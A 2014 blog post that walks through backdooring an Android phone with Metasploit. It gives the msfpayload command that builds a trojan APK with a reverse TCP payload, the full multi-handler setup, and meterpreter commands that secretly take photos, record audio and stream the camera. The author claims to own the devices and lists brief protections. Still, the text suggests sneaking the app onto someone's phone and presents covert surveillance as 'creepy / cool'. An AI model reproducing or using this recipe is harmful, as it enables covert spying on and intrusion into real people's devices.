In the interest of full disclosure this article technically should be called “things you can do on android with meterpreter”
So I found myself with some free time this weekend, so I decided I would put together a quick post on using one of the most widely used penetration testing frameworks, Metasploit. A few months ago I started looking into Metasploit and began teaching myself the basics, what struck me most from my initial observations and tinkering with Metasploit is how incredibly easy it was to use, which is great for Security professionals who are starting out or just people who are interested in the field.
Often we read about security breaches and cybercrime in the news, in 99.95% of the articles on these topics take a high level approach (there are a wide range of reasons for why articles take this approach which I won’t delve into, but feel free to leave a comment on why you think this happens) unfortunately this makes it hard for IT Pros to figure out exactly what happened and how they can defend against these threats, fortunately tools like Metasploit help to bridge the knowledge gap and are leading us on the way to being a little more secure.
So what is Metasploit?
As I briefly glossed over earlier Metasploit is a popular penetration testing framework and penetration testing toolkit, so what does that mean you may ask? In a nutshell Metasploit is a powerful tool which has thousands of prebuilt exploits (programs which can take advantage of security vulnerabilities to give you access to or control over a machine which you would not normally have control over). Metasploit also gives you the ability to write your own exploits for security vulnerabilities and execute them against machines.
For those of you who aren’t Technical and don’t really understand what the above paragraph means I’ll summarise it this way: Metasploit is a tool which you can use to hack Computers, tablets, phones and other devices.
So without further ado ill jump right in to explaining what you can do with Metasploit on an Android Phone.
What I used
For This post I used the following devices and tools:
- A (non-rooted) Samsung Galaxy S3 with a 4GB microSD card connected to my wireless network
- An 8GB SanDisk Bootable Flash drive with Kali Linux installed (Metasploit is installed by default on Kali Linux)
- A PC with a Wireless card connected to my wireless network.
As a quick reminder I owned all of the devices used in this example. If you were to replicate this example with devices you do not own it may be a criminal offence.
This should be fairly straight forward:
- Ensure that the android phone is connected to a local area network and make sure you know its IP address.
- Plug your bootable flash drive into a PC which is powered off and power it on (you may need to make sure that your PC checks for bootable media before booting off the hard disk.
- Once the PC has booted into Kali Linux make sure it’s connected to the same local area network as the Android device.
A Quick note here this example carries out this activity on a single network and this example can be modified to work across multiple networks.
So how do you get an meterpreter session on and android device?
This by far the part where you can be most creative, the resource links show a few creative ways to do this using multiple Metasploit exploits. I don't want to give to much away so the method I used was to sneak it onto somebody’s phone by uploading it to a microSD card and install it while you have physical access to their phone, you could however hire Ninjas to take care of this for you.
The method I chose (for simplicity)
For simplicities sake I chose option 5, here’s how I carried it out:
First you have to create a backdoor “Trojan App” to exploit android you can do this by running the following command at the terminal:
root@kali:~# sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.21 lport=4444 R > app.apk
The LHOST address will be the attackers IP address (your Kali Linux machines IP).
Next I copied the file onto a microSD card and installed it (note here that you have to have install from unknown sources enabled)
Now on my PC booted up with Kali Linux I ran the following commands:
Use the multi-handler exploit:
msf > use exploit/multi/handler
Set the reverse TCP android payload:
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
Set the local and remote hosts:
msf exploit(handler) > set lhost 192.168.0.21
lhost => 192.168.0.21
msf exploit(handler) > set rhost 192.168.0.17
rhost => 192.168.0.17
Set the local port:
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.0.21:4444
[*] Starting the payload handler...
[*] Sending stage (40248 bytes) to 192.168.0.28
[*] Meterpreter session 1 opened (192.168.0.21:4444 -> 192.168.0.28:59439) at 2014-08-03 17:54:17 +0000
Now that you have a session open make sure the user clicks on the app called MainActivity and then you can begin with meterpreter.
Creepy / cool things you can do with your meterpreter session
So after you have an meterpreter session open you basically have free reign to do whatever you like on the device so ill show some of the most creepy / cool examples:
View running processes
I often start by printing the working directory:
meterpreter > ps
Printing the Working directory
I often start by printing the working directory:
meterpreter > pwd
Search for a file
Run the “search” command:
meterpreter > search –f *.mp3
No files matching your search were found.
Take photos using the devices cameras
First list all the webcams that are available:
meterpreter > webcam_list
1: Back Camera
2: Front Camera
You can now run the webcam_snap command, by default it takes a photo using the first camera:
meterpreter > webcam_snap
[+] Got frame
Webcam shot saved to: /root/liRDOzXS.jpeg
If you want to take a photo using the second camera
meterpreter > webcam_snap –I 2
[+] Got frame
Webcam shot saved to: /root/oFsDkLjd.jpeg
The command output will usually tell you what the file has been saved as
Record sound with the microphone
Run the record_mic command:
meterpreter > record_mic 5
Audio saved to: /root/JxltdUyn.wav
I didn't have much luck with this one it seemed to produce files that were not playable, but that could be something to do with the PC I was using.
Viewing a video stream from the devices camera
Run the following command to stream from the second camera:
meterpreter > webcam_stream –I 2
[*] Preparing player…
[*] Opening player at: LCInGfYj.html
How you can protect against this
- Only install apps and software from the google play store.
- Run some sort of (trusted) 3rd party security software and regularly audit your phone.
- Make sure you don’t have enable installs from unknown sources enabled.
- Keep your phone in your possession at all times.
- Avoid opening any suspicious links in emails or text messages.
Please let me know if found this article useful or if you didn't, leave a comment below to let me know another area you would be interested in reading posts about.